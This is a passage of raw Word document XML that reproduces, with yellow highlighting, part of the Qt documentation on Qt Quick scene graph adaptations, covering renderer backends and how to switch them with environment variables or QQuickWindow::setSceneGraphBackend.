          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Не спрабаваў.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRDefault="0060552B" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D94480" w:rsidRPr="00D94480" w:rsidRDefault="00490E7E" w:rsidP="00D94480">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2104" w:history="1">
        <w:r w:rsidR="00D94480" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="00D94480" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="00D94480" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="00D94480" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00D94480" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00D94480" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00D94480" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
        <w:r w:rsidR="00D94480" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="00D94480" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00D94480" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-5/</w:t>
        </w:r>
        <w:r w:rsidR="00D94480" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtquick</w:t>
        </w:r>
        <w:r w:rsidR="00D94480" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00D94480" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>visualcanvas</w:t>
        </w:r>
        <w:r w:rsidR="00D94480" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00D94480" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>adaptations</w:t>
        </w:r>
        <w:r w:rsidR="00D94480" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00D94480" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D94480" w:rsidRPr="00D94480" w:rsidRDefault="00D94480" w:rsidP="00DE5C7D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1765" w:name="_Toc483000912"/>
      <w:bookmarkStart w:id="1766" w:name="_Toc483003903"/>
      <w:bookmarkStart w:id="1767" w:name="_Toc483604256"/>
      <w:bookmarkStart w:id="1768" w:name="_Toc483605476"/>
      <w:r w:rsidRPr="00DE5C7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scene Graph Adaptations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1765"/>
      <w:bookmarkEnd w:id="1766"/>
      <w:bookmarkEnd w:id="1767"/>
      <w:bookmarkEnd w:id="1768"/>
    </w:p>
    <w:p w:rsidR="00D94480" w:rsidRPr="00D94480" w:rsidRDefault="00D94480" w:rsidP="00D94480">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1769" w:name="scene-graph-adaptations-in-qt-quick"/>
      <w:bookmarkEnd w:id="1769"/>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Originally</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Qt Quick only had </w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>one available renderer</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for parsing the scene graph and rendering the results to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>render target</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This renderer is now the </w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default OpenGL Renderer</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which supports rendering either using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenGL ES 2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenGL 2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (with framebuffer object extensions) APIs. The Qt Quick APIs have originally been designed with the assumption that OpenGL is always available. However, it is </w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>now possible to use other graphics API's</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to render Qt Quick scenes using the scene graph APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D94480" w:rsidRPr="00D94480" w:rsidRDefault="00D94480" w:rsidP="00081348">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1770" w:name="switching-between-the-adaptation-used-by"/>
      <w:bookmarkStart w:id="1771" w:name="_Toc483000914"/>
      <w:bookmarkStart w:id="1772" w:name="_Toc483003905"/>
      <w:bookmarkStart w:id="1773" w:name="_Toc483604257"/>
      <w:bookmarkStart w:id="1774" w:name="_Toc483605477"/>
      <w:bookmarkEnd w:id="1770"/>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Switching between the adaptation used by the application</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1771"/>
      <w:bookmarkEnd w:id="1772"/>
      <w:bookmarkEnd w:id="1773"/>
      <w:bookmarkEnd w:id="1774"/>
    </w:p>
    <w:p w:rsidR="00D94480" w:rsidRPr="00D94480" w:rsidRDefault="00D94480" w:rsidP="00D94480">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The default of the OpenGL, or - in Qt builds with disabled OpenGL support - the software adaptation, can be overridden either by </w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>using an environment variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or a </w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C++ API</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The former consists of setting the</w:t>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QT_QUICK_BACKEND</w:t>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or the legacy</w:t>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QMLSCENE_DEVICE</w:t>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>environment variable before launching applications. The latter is done by calling</w:t>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2105" w:anchor="setSceneGraphBackend" w:history="1">
        <w:r w:rsidRPr="00450174">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::setSceneGraphBackend</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> early in the application's main() function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D94480" w:rsidRPr="00D94480" w:rsidRDefault="00D94480" w:rsidP="00D94480">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The supported backends are the following</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D94480" w:rsidRPr="00D94480" w:rsidRDefault="00D94480" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenGL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Requested by the string</w:t>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or the enum value</w:t>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2106" w:anchor="GraphicsApi-enum" w:history="1">
        <w:r w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGRendererInterface::OpenGL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D94480" w:rsidRPr="00D94480" w:rsidRDefault="00D94480" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Software</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Requested by the string</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"software"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or the enum value</w:t>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2107" w:anchor="GraphicsApi-enum" w:history="1">
        <w:r w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGRendererInterface::Software</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
